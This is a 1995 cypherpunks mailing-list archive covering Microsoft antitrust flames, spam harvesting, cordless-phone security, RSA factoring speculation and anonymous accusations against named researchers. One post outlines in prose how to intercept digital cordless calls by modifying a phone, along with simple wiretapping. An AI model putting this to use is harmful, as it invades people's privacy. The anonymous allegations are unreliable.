decade. the big bad Gates Wolf  sunk his fangs into IBM. yes, Gates is a
dracula. hee, hee. perhaps you would like to start a government program
to help poor companies that don't have the brains to understand a market
when it is screaming at them in their faces? lets call it the "dog eat dog"
welfare fund.

> IBM did not fall by the market rejecting IBM 
>--the market exploded with the PC for price and diversity reasons: you 
>can not compare direct entry, full screen aplications and 
>transportability of a PC against a looped, expensive main-frame 
>connection, if the boss even approves the cost.

IBM failed because they had no brain to recognize what was happening around
them. Gates did, and his success proves the correctness of his vision. 
the market is the force that will use or throw away companies as it sees
fit. it doesn't care about loyalty to a company that has lost the edge.

> Bill Gates
>has used his operating system dominance to force hardware vendors to ship
>MS products on _every_ machine, or pay substantial penalties in rates 2
>and 3 times larger for all MS products --cheap only if it is universal. 

Gates is free to demand as much payment for his products and services that
the market will bear. if the market decides it's highway robbery, Gates
will go the way of the dodo bird.  perhaps you think that the government
should now subsidize purchase of windows 95 so that everyone can get their
copy?

>   The real issue in DOJ v. MS was that although Bill complied with a 
>consent decree, he _immediatley_ found other ways to apply the screw, and 
>many of these newer terms are even worse, but more subtle. And, there is 
>no question the verbal threats have been significantly worse.

all far less than the slimy tactics used by his detractors to limit his
ability to compete freely in the market, such as all the "antitrust" laws
supposedly relevant to his situation.

> To software 
>vendors it is the threat of denial of technical information on GUIs and 
>APIs, to hardware manufacturers it is threats of ecomnomic sanctions, 
>including publishing decertification of the platform for various WIN95 
>and NT compliant stickers, etc.

why should Bill be forced to do business with people who would love to
slit his throat? answer: he doesn't have to. he can flick his finger at
them. and if they misunderstand his right  to do this, they misunderstand
the essence of America.

>    Bill Gates is NOT an ethical businessman. If the fact was that Bill
>was able to garner his position from hard work, a better product, and a
>well-greased advertising and marketing organization would not justify the
>application of the classic Sherman and Clayton anti-trust rules; the
>market will either continue to accept them or not. 

that's absolutely what he has done, and none of your hocus-pocus flimflamery
can rebut this truth.

>    However, Bill has used his position of 85% in OSs not only to dictate 
>OS considerations, as bad as they are with DOS nothing more than a boot 
>sector virus and Windows a pretty program loader, but he has used this 
>position to dominate the applications market by bundling and forcing 
>machine integrators to include the MicroSoft applications in return for 
>the OEM discount on the operating systems.  

horrors!! you mean that if someone is successful, they have more influence
on the market?? *gasp*

> Preloading the market by those means is _not_ ethical or good
>business.

Gates is free to do whatever he likes. the market decides what is appropriate
by where it spends its money. so far, it support him. are you going to argue
with everyone who spent money on MS products and say, "no, that's not really
what you wanted!!"  whose business of it is yours to limit the freedom of
consumer choice?

> Bill Gates _clearly_ violates the FTC provisons on ethical
>conduct and restraint of trade by a monopoly or quasi-monopoly position. 

"Gates is selling all the widgets and gizmos!!! no fair!!!"

>Why were nearly 30 OEMs represented anonymously in "friend of the court"
>briefs? --and the first thing Billy's (hired virtually every high end firm
>in SF) attorneys' did was subpoena the _names_ of the consortium under the
>rules of evidence --welcome to the "Kiss of Death." 

*gasp* -- finding out who is out to slit your throat. yes, it should be
mandatory that people can anonymously attack him (as you are doing) without
any possibility of consequence. let's just put a bag over his head and
let everyone take free punches. that would be appropriate, don't you think?

>    Personally, I think it is time to dismember Bill Gates --give him a
>choice of his OS group or his applications group and literally force him
>to sell all direct or indirect interest in the one he does not choose,
>plus forego any involvement. 

unfortunately, your puffhead arguments, falsehoods, innuendoes
 and hallucinations are beginning to grip people who matter. in fact
it is becoming quite trendy to besmirch MS.

>Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound 
>gorilla has not paid attention in history classes:

anyone who thinks that business involves charity for the intellectually
challenged has not paid attention to reality of the free market.

>	power corrupts
>	    absolute power corrupts absolutely.

funny how this statement is always assumed to apply to microsoft, not to
the companies that are trying to anonymously slash his throat in courts as a 
desperate resort when they have failed the egalitarian test of the marketplace.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Dec 95 18:06:40 PST
To: cypherpunks@toad.com
Subject: Surprise telecommunications bill?
Message-ID: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


While watching the national news (NBC, I think) they mentioned that there
had been a "surprising agreement on a telecommunications bill".  From the
sparse description, it sounded pretty nasty. 

Does anyone have any additional information on this?

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 15:28:01 PST
To: harmon@tenet.edu (Dan Harmon)
Subject: Re: [NOISE] revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
Message-ID: <199512202327.SAA10742@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dan Harmon writes:
> Perry,
> 
> the only crypto code you seem to do is the unintelligble postings
> that you send to the list.

Keep this irrelevant crap off cypherpunks.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 15:37:18 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <199512202337.SAA10846@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous "Bill Gates" writes:
> I'm not trying to start a flame war. 

Bullshit. 

[inconsequential prattle elided]

This thread is completely off-topic. Besides, we've gone through all this on
the list before. Let's not continue it. We all have more productive things
to do with our time.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 20 Dec 95 15:45:25 PST
To: cypherpunks@toad.com
Subject: NTT & electronic "cash"
Message-ID: <01HZ1GUUJERK8Y52ZW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This qualifies as one of the most uninformative news items I've seen
from Reuters. Anyone know any substantive info on their process?
	-Allen

---------------------
   Reuters New Media
   
   _ Wednesday December 20 2:04 PM EST _
   
NTT Says Develops Secure Electronic Cash System

   
   
   TOKYO- Nippon Telegraph and Telephone said today that it has developed
   a secure electronic cash system which can be used for settling
   transactions on the Internet and in daily life using smart cards.
   
   "The system has very secure algorithms, and that makes fraudulent
   uses of the system very difficult," NTT researcher Mikio Suzuki
   told Reuters.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Dec 95 16:12:29 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <9512210012.AA19612@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think this conversation is getting silly even by net.standards.

On the one hand we have the screaming libertarians with a bunch of 
wedged political notions about property. On the other we have what 
appear to be arch anti-capitalists claiming that nobody who earns
a living out of crypto can be a cypherpunk. What is really strange
is that these appear to be the _same_ people.

Now I'm not one for supporting corporativism but consider this, most
if not all of the technical contributors to this list who can earn
money from their crypto knowledge do so. Matt and Jeff are not alone
in being paid for their abilities.

Another thing is that many of us are also into government contract
work up to their necks. The Web consortium is funded partly through
an ARPA grant. MIT is practically floating on government subsidies.
Yes this is where your tax dollars go, learn to love it or die 
bitching.

The point is that the tourist element who gripe on about nothing other
than their political views and never contribute any technical input are
not the people that make the list work. People like Matt and Jeff are
the people who make the list worthwhile.


		Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 11:16:39 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: (fwd) Junk email address collection (from a junk emailer)
In-Reply-To: <Pine.ULT.3.91.951219210009.8207F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.91.951220184848.5597E-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Rich Graves wrote:

> Personally, I think anyone who uses dejanews as a way to grep Usenet is
> an idiot, but since this idiot actually did spend several hours doing so,
> and then sent unsolicited commercial email to several thousand people,
> it's worth listening to him. 
> 
	[snip]

    [START] <attila>
	"forcing" a change on DejaNews to strip addresses would defeat
    the "redeeming" value of such a database. Since I, like many, 
    occasionally fall into the trap of opening my response before
    clutching in my brain, I used DejaNews to "count" the gaffes! 
    Fortunely, none on that search, just the usual sloppy keyboard entry.
	and, coming down on DejaNews just puts the fire out in just one 
    room of a conflagration. 
    [CONTINUE]

> Here it is:
> 
> When one of these mailers goes to do a search (and from what I hear, many
> of them do it on regular intervals to get new names) they cannot do a TERSE
> search. Why?  Because it cuts off the email addresses if you notice the
> output.  They cannot obtain addresses from this data.
> 
> So what do they do?  They do a VERBOSE search and this way the email
> addresses are completely listed.
> 
> Make a change to this VERBOSE search option so that it will only list the
> partial email address, and you will eliminate THOUSANDS, if not millions of
> unwanted email messages on the Net.
> 
> I guarantee if they made this change to the site it would make a HUGE
> difference.  From what I hear, most newsreaders only list news post lists
> by "author" and not by email address, so these companies cannot easily
> strip names through regular newsgroup programs, and must use a service
> (like Deja News) to compile large email lists.
> 
	[snip]

    [START] <attila>
	Searching with a news reader message by message would be more than
    painful!  all they need to do to obtain names from any newsgroup 
    is to scan the entire news base, or groups of interest. It took me 
    less than a minute to strip names from the alt.religion tree.
	I dont think the spammers are too worried about adding a few names 
    when groups are sorted by interest anyway.

	for amusement, I have started to code a simple program which
    takes a feed from procmail where known spammers are listed and it 
    prepends a message about spamming and send 1 - n copies to the 
    offenders' PostMaster.  ...and, I will send them from my own address 
    as a token of my affection....

	The only aggravation is adding offender to procmail after finding 
    the source as many are using remailers.  If they have 800 numbers, 
    there are always auto-dialers with a message.. ..

	I hate to waste the bandwidth, but the spammers are getting out 
    of hand and procmail -> /dev/null is less than satisfying!

    [END] <attila>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 20 Dec 95 16:35:58 PST
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <199512210039.TAA24305@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jason Rentz wrote:

| Forgive me if this is a stupid question.

Hmmm.  Will you pay us?

| I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)
[...]

| Is there a way to encrypt a script yet still allow it to be runnable?  I
| know that the simple answer is to write it in C and compile it but I don't
| have the means of doing that at the moment.  (i.e. there is not compiler on
| the system)
| 
| I thought of a few simple protections but they all involve decrypting before
| running.

	Ever hear of chmod?  chown?
Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 20 Dec 95 16:55:57 PST
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512210053.TAA11344@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First, thanks for the obvious 'kind' thoughts Tim... It's heartening that
you took the time to add some substantial info to the thread. However...

> On 12/18/95 At 12:36 AM -0500, Timothy C. May wrote:

> >What caught my attention was the architecture.
> >
> >A "hybrid design linking two supercomputer processors with an
> >array of HALF A MILLION inexpensive processors" that were
> >designed by the U.S. government laboratory affiliated with the
> >NSA. The same chip house that brought us Clipper.

> First, half a million chips is not that big a deal...the Connection Machine
> had up to 64,000. Very few cryptographic problems of interest to us will be
> affected by a mere factor of a million or so.

O.K. Just a factor of 16 increase over the CM architecture right? Not knowing
the computational capabilities of the individual processors, it might be
difficult to say what the machine is capable of. Wouldn't that have some
bearing?

> Second, there was work on a "processor-in-memory" architecture, in
> conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
> what you are thinking of?

I didn't mention a 'processor-in-memory' architecture and neither did the NYT
article. Don't know about any other company involvement, just CCC and NSA.

> Third, all avenues of continued funding having fallen through, Cray
> Computer (not Cray Research, of course) was shut down and assets
> liquidated. I haven't heard what's become of Seymour, though. (He is
> undoubtedly an asset, buy I doubt the Agency would have him liquidated.)

You mean the avenues that are of PUBLIC record. The possibility could always
exist that the development continues 'in-house'. It wouldn't be the first time
that sort of move has been played.

> >I've not kept up with the "ultimate" demise that eventually
> >befell Cray Computer Company, but the October 16 FBI filing
> >on capacity for Digital Telephony got me thinking back to this
> >article. 1% seems like a rather huge need for horsepower. And
> >what if GAK doesn't fly? And the widespread use of hard crypto
> >just keeps increasing?

> The tightly-coupled supercomputers are hardly needed for these sorts of
> problems.

You mean the problem of data collection? Well, it's true that this would be a
misuse of a supercomputer's specialized talents.

> >This kind of machine could, in theory:
> >
> >1) Implement ALL Clipper(II) based Key Escrow functionality in
> >   silicon (the easy part) AND allow for simultaneous decrypt and
> >   surveil of 'who knows how many' Clipper based data streams.

> Huh? First, what evidence do you have for this claim? Second, who cares?
> Implementing Clipper in a Cray Computer machine--why bother?

[Rant mode on]
Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory
probably has holes you could drive a FLEET of Mack trucks through. I have NO
evidence. I'm not sure WHO would care. I'M A PARANOID DILLUSIONAL PSYCHOPATH!
O.K. well maybe not that last part... but I'm asking the questions, remember?
I said I'm new here, so if your going to blow holes in my pet theories, then
do me the 'kindness' of using an accurate weapon... that's why I posted...

> As to the claim that a million-processor machine could do this, you need to
> work out the math. (If a backdoor exists, or the LEAF has been gotten, a
> supercomputer is not needed....)

Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would
YOU build a machine like this? What could POSSIBLY be it's capabilities?
Speculate with me for a moment... *_take a chance_*.

> >2) Implement general RSA based Prime Factoring functionality in
> >   silicon (the not so easy part) AND allow massively parallel
> >   decrypt and surveil of 'who knows how many' RSA/etc. based
> >   data streams.

> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> has two factors.)

Yes, my terminology sucks! But you get the drift don't you? Math is not a
strength of mine, I only know in very general terms what is involved (why,
then, am I even bothering to bring this up?). Because I AM however, VERY
concerned in the continual erosion of privacy rights in all forms
communications, electronic and otherwise.
[Rant mode off]

> If you mean using supercomputers to brute force the general factoring of an
> RSA modulus, this is nonsense. While there may be math shortcuts we don't
> yet publically know about which make factoring easier than we currently
> think it is, a mere million or even a billion processors will not make a
> dent in the factoring of, say, a 700-digit modulus. See the tables in
> Schneier and elsewhere for some estimates of factoring efforts needed.

Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the
tables that you refer to. Where may I find them? (LOL)

> >3) Implement it all, AND 'on-line' transaction based surveillance
> >   via the FBI's 1% capacity infrastructure.

> Let's see some numbers. (On second thought, let's not.)

No, I've already said that math is not a strength I possess. I've wondered
about the ability of the FBI to count on ten fingers and ten toes given some
of the justification that I've read for this capacity figure...

> >Chilling... Who needs key escrow (or RSA private keys) when
> >you've got a massively parallel prime factoring machine. What if
> >GAK was to become a 'non-issue'? How fast do you think a machine
> >such as this could factor RSA 129?

> Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so
> the computation for a million SPARC-equivalent (or even
> UltraSPARC-equivalent) can be done.

Sorry... I asked the question... and your speculation is (I would hope) MUCH
more accurate than mine. Again, math is not a strength of mine.

> When you've done this, and concluded that RSA-129 could be done in, say, X
> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> centuries it will take. (Hint: Rivest and Schneier have done these
> calculations....)

Yes, I believe that I've read Rivest's paper on the statistical probabilities.
I've never really believed in statistics, AND I'm sure you don't have the time
to convince me Tim (I'm sorry if I've been less than reverencial about this,
but I'm from Illinois which is right next door to Missouri).

> --Tim May, who fears that he's just been trolled by Derek Atkins

No Tim, you have not... but on another note...

> It'll be _many_ years before a 384-decimal-digit number is factored, I
> suspect. Let alone a 600-digit modulus, with or without the mysterious
> "transphaser" technology mentioned by Anitro.

The "transphaser" is an optical equivalent to the transistor. It is a quantum
threshold optical switch, but it is not a 'mystery'. You should read Scientific
American more often ;>

O.K. I'm done with this line of discussion, you may however, continue to
     elaborate as I will, no doubt, continue to read...

Anitro

"I have a little shadow that goes in and out with me,
 And what can be the use of him is more than I can see" R. L. Stevenson




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNiv8SoZzwIn1bdtAQHyewF+OXlM8KueHrCynKGhjqXy8eHLSonn12Df
vcAdDoaajoi5t7CfY9lP/+FNeO2JKE+v
=SIKC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Wed, 20 Dec 95 20:01:37 PST
To: attila <attila@primenet.com>
Subject: Re: (fwd) Junk email address collection (from a junk emailer)
In-Reply-To: <Pine.BSD.3.91.951220184848.5597E-100000@usr5.primenet.com>
Message-ID: <Pine.SUN.3.91.951220195528.24159H-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 20 Dec 1995, attila wrote:


> 	and, coming down on DejaNews just puts the fire out in just one 
>     room of a conflagration. 

	Especially since DejaNews is neither the first, or most
	thuro in archiving usenet messages.

	I still want to know who is feeding netcom.shell.* to
	he outside world, so that excite can document every 
	whisper there.



> 	for amusement, I have started to code a simple program which
>     takes a feed from procmail where known spammers are listed and it 

	I want a copy of that program.  



        xan

        jonathon
        grafolog@netcom.com



****************************************************************
	
	Opinions represented are not necessarilly mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Wed, 20 Dec 95 11:15:06 PST
To: cypherpunks@toad.com
Subject: CFS and Linux
Message-ID: <199512201915.UAA00215@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there anyone out there that has CFS running with Linux ?

It installs fine on BSDi 2.0 but I'm unable to install it 
under Linux, I would appreciate it if some one would help
me out.

 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 20 Dec 95 12:16:19 PST
To: cypherpunks@toad.com
Subject: The Problem With Blaze And Weinstein
Message-ID: <199512202018.UAA02824@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm not trying to start a flame war. I'm
sure these people are very smart and have
written lots of good code. I'm sure they're
very nice and never kick their dogs.  I'm
just tired of people defending them as
cypherpunks.

They aren't cypherpunks.

Neither has come out against GAK. They
both carefully avoid commiting to any
statement. They want us to think they're
"one of us" but they don't want to be
pinned down because they are double dipping
on both sides of the fence.

Blaze even does "research" on GAK. See
his web page for evidence. Also the TIS
report. The fact that he found a bug in
clipper doesn't change this. It proves
it.  He works for the government, via att.

Weinstein is actively promoting GAK by
working at the company that the government
has chosen to bring it to you now that
att has failed.

WHY IS EVERYONE SO QUICK TO DEFEND THESE
PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED
WITH THEIR MASTERS DEGREES THAT YOUR AFRAID
TO LOOK CLOSELY?

No, I did not post the RSA patch. I wouldn't
touch any of that code with a 5 meter pole.

To the guy who says write code: I've
written plenty of code. Clue: your probably
running some of it right now.

I'm anonymous because I've seen FIRST HAND
what the att lawyers do to people who
tell the wrong kind of truth.

Want me to be a 'nym. OK.

s/ Bill Gates (he has good lawyers that
can handle att and netscape)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 12:27:29 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <199512200844.AAA24193@netcom6.netcom.com>
Message-ID: <Pine.BSD.3.91.951220193251.5597F-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   Markoff is not the best on criticism. write the editor direct.
                       ----------------------------------

   Microsoft particularly does seem to place a death grip on things, but
more industry consortiums are forming and Billy has been required to accept
the heat; Java is one, except Billy always finds a way to subvert the
process. Billy is like Karl Marx' premise: "sign all treaties; break them 
when it is convenient."

   The conundrum is trying to decide "when" a particular company is a 
monopoly by either the classic definition of the Sherman and Clayton Acts 
or an effective monopoly, or "bad" player as defined in the 
Robinson-Patman act. 

    Bill Gates more than satisfies the requirements of defining a monopoly
in Sherman and Clayton with 85% of the desktop locked in and an assualt
with "almost" standards on the open-system server market. NT is already
garnering more than 25% of server installations in business --big
business, since it will be "guaranteed" compatible with their desktop 95s. 
The rest of us, stay with the real thing.

    Add to MS' virtually absolute domination of the desktop and its 
impending domination of the commercial servers the fact that MS has 95% 
of the front line office products --WP, Spreadsheet, Database, and mail 
with the last be non-standard to long established rules and you do have a 
problem to be considered. 

    Will the market correct itself?  Very questionable since MS rode to 
its position on IBM's back and capitalized on IBM's failure to recognize 
what they had stumbled into. IBM did not fall by the market rejecting IBM 
--the market exploded with the PC for price and diversity reasons: you 
can not compare direct entry, full screen aplications and 
transportability of a PC against a looped, expensive main-frame 
connection, if the boss even approves the cost.

    However, Bill Gates' more serious offense involves the fair trade
provisions of the Robinson-Patman act and the subsequent fine-tuning of
the Federal Trade Commission (FTC) which has its own courts. Bill Gates
has used his operating system dominance to force hardware vendors to ship
MS products on _every_ machine, or pay substantial penalties in rates 2
and 3 times larger for all MS products --cheap only if it is universal. 
Under these conditions, why would they ship OS/2 or UNIX? Add a few more
of his contractural items and Anne Bingaman was correct in charging Bill
with restraint of trade. 

   The real issue in DOJ v. MS was that although Bill complied with a 
consent decree, he _immediatley_ found other ways to apply the screw, and 
many of these newer terms are even worse, but more subtle. And, there is 
no question the verbal threats have been significantly worse. To software 
vendors it is the threat of denial of technical information on GUIs and 
APIs, to hardware manufacturers it is threats of ecomnomic sanctions, 
including publishing decertification of the platform for various WIN95 
and NT compliant stickers, etc.

    Bill Gates is NOT an ethical businessman. If the fact was that Bill
was able to garner his position from hard work, a better product, and a
well-greased advertising and marketing organization would not justify the
application of the classic Sherman and Clayton anti-trust rules; the
market will either continue to accept them or not. 

    However, Bill has used his position of 85% in OSs not only to dictate 
OS considerations, as bad as they are with DOS nothing more than a boot 
sector virus and Windows a pretty program loader, but he has used this 
position to dominate the applications market by bundling and forcing 
machine integrators to include the MicroSoft applications in return for 
the OEM discount on the operating systems.  

    Preloading the market by those means is _not_ ethical or good
business. Bill Gates _clearly_ violates the FTC provisons on ethical
conduct and restraint of trade by a monopoly or quasi-monopoly position. 
Why were nearly 30 OEMs represented anonymously in "friend of the court"
briefs? --and the first thing Billy's (hired virtually every high end firm
in SF) attorneys' did was subpoena the _names_ of the consortium under the
rules of evidence --welcome to the "Kiss of Death." 

    Personally, I think it is time to dismember Bill Gates --give him a
choice of his OS group or his applications group and literally force him
to sell all direct or indirect interest in the one he does not choose,
plus forego any involvement. 

   An example of the "ill" is Gate's clear announcement that _all_ MS
programs would now be geared to direct interface to the internet --again
initially only the Microsft Network with proprietary standards.  This may
be commendable on the intended results of better integration to the world,
but not in terms of free trade as _everything_ MS does is proprietary, or
they do not release _correct_ API information until they have taken a
commanding lead in the market (witness Compu$erve and the rest on no
access to Win95 --IBM put their network and a button for other networks,
with a working PPP interfacein the same folder). 

    Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound 
gorilla has not paid attention in history classes:

	power corrupts
	    absolute power corrupts absolutely.

	he who fails to heed history,
	    is doomed to repeat it.  (which is mankind's normal path)

    ATTILA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 20 Dec 95 17:35:00 PST
To: jpp@software.net (John Pettitt)
Subject: Re: 900mhz digital phones - how much to trust ?
In-Reply-To: <199512202219.OAA26567@software.net>
Message-ID: <9512210134.AA05683@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> John Pettitt, jpp@software.net writes:
> 
> 
> Whats the current thinking on the security level of 900Mhz digital spread
> sectrum cordless phones? Clearly it's not a basic scanner job but how much
> more equipment is needed to monitor one ?

	The easiest way to do this is to simply buy a similar phone
which has all the required signal processing hardware for that particular
type of spread spectrum and modify it to receive promiscuously and
not transmit while doing so,

	As far as I know, essentially no cordless phones use any kind of
actual secure encryption of the digital bit stream, so all you have to
do is ensure that your shadow phone is primed with the correct spreading
sequence or hopping sequence and is tuned to the right center frequency.
Typically choices for these are very limited (maybe 20 channels) and
modifying the micro firmware in a phone or base unit to search all
possiblities is realistic, especially with the help of an external PC as
controller.

	The digital 900 mhz phones all use different proprietary
modulation schemes, but many of them simply transmit a FSK or BPSK rf 
carrier digitally modulated by the output bitstream of a codec chip
(CVSD or regular u-law PCM) on one of several randomly selected
channels,  perhaps slowly hopping from channel to channel in a fixed
sequence.  Even the phones that use direct sequence spreading are
effectively just transmitting a fast BPSK signal modulated at the chip
rate.   Receivers and signal processing boxes capable of dealing with
this kind of digital modulation are a standard commodity item in the
spook world (made by Condor Systems and Watkins Johnson and the like)
and even sometimes show up on the high tech surplus market (and are
collected by some of us who collect high tech spook hardware as a hobby)
- they are however very expensive compared with simply modifying a
couple of real phones to do the job.

	The digital modulation and "spread spectrum" features of 900 mhz
phones are primarily intended to allow them to share the 902-928 mhz
band with all the other users (other phones, truck tracking systems
short range wireless video cameras and video distribution, various
industrial users, wireless LANs of several types, ham radio operators,
and several other types of unlicensed uncoordinated devices radiating up
to 1 watt of power) without suffering the kind of  interference that
has plagued the older 46/49 mhz FM type.  The FCC in fact requires
some level of spectrum spreading for this purpose but leaves the
actual choice up to the implementor rather than establishing a standard
method.   

	Obviously only a secure form of encryption with randomly  chosen
and wide enough keys would really make intercepting a digital cordless
phone difficult for someone determined to do so, especially if they were
targeting one particular phone.  I believe almost all of the
manufacturers have chickened out in the face of NSA and ITAR and not
even implemented toy encryption with random keys - they are simply
assuming that Joe Sixpack or his 14 year old son won't be able to pick
them up  on a commercially available scanner and that the federal law
banning sale of scanners capable of intercepting digital transmissions
and converting them to analog listenable audio will keep the scanner
companies from marketing such and keep customers from complaining about
nosey neighbors listening to their calls.

	But don't assume that if someone really has some serious reason
to want to intercept one they won't be able to - and it is almost
certain that expensive ($5-$20K) DSP based systems capable of 
intercepting several common types are already for sale to the usual
suspects.

	And finally one should not forget that unless one has an ISDN
line, intercepting calls on regular analog subscriber loops (normal
telephone lines) by virtually undetectable simple alligator clip class
wiretaps or bugs is something that any bright 12 year old can pull off
(and many do before they grow up) - so if you have something to hide you
shouldn't trust the phone at all.

						Dave Emery
						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 95 18:01:40 PST
To: cypherpunks@toad.com
Subject: Re:  ex encrypted script
Message-ID: <9512210158.AA07882@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Is there a way to encrypt a script yet still allow it to be runnable?  I
>know that the simple answer is to write it in C and compile it but I don't
>have the means of doing that at the moment.  (i.e. there is not compiler on
>the system)

Given your constraints:  no.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 95 18:03:07 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <9512210200.AA07896@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> MIT is practically floating on government subsidies.

Actually, if you discount Lincoln Labs, not really.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 20 Dec 95 19:10:00 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: An Apology to Mr. Merzger
In-Reply-To: <199512202359.SAA29012@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951220210124.8832D-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry and members of this list,

I want to publicly apologize to Mr. Metzger. On reviewing the events of the
day, it seems that I misunderstood a post by Perry. It seems that I was 
missing a previous post that was being referenced. As to the 
misunderstood message, I have to now agree with Perry and his reponse.

Please accept this apology.

Dan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@jaramillo.digit.ee>
Date: Wed, 20 Dec 95 11:27:32 PST
To: cypherpunks@toad.com
Subject: FTC Privacy Initiative (fwd)
Message-ID: <Pine.SOL.3.91.951220212612.8508E-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 20 Dec 1995 09:22:11 -0800
From: Internet Marketing Discussion List <internet-marketing@popco.com>
To: internet-marketing@popco.com
Subject: FTC Privacy Initiative

From: Lewis Rose <lewrose@arentfox.com>

        The US Federal Trade Commission has launched a "Privacy Initiative"
to investigate whether the information collected at websites (either that
affirmatively submitted by a visitor via a form or information collected
based upon a visitor's selection of pages at a site to reflect personal
interests) should be the subject of regulation by the FTC.  To get
background on this effort, you may want to read a speech by FTC Commissioner
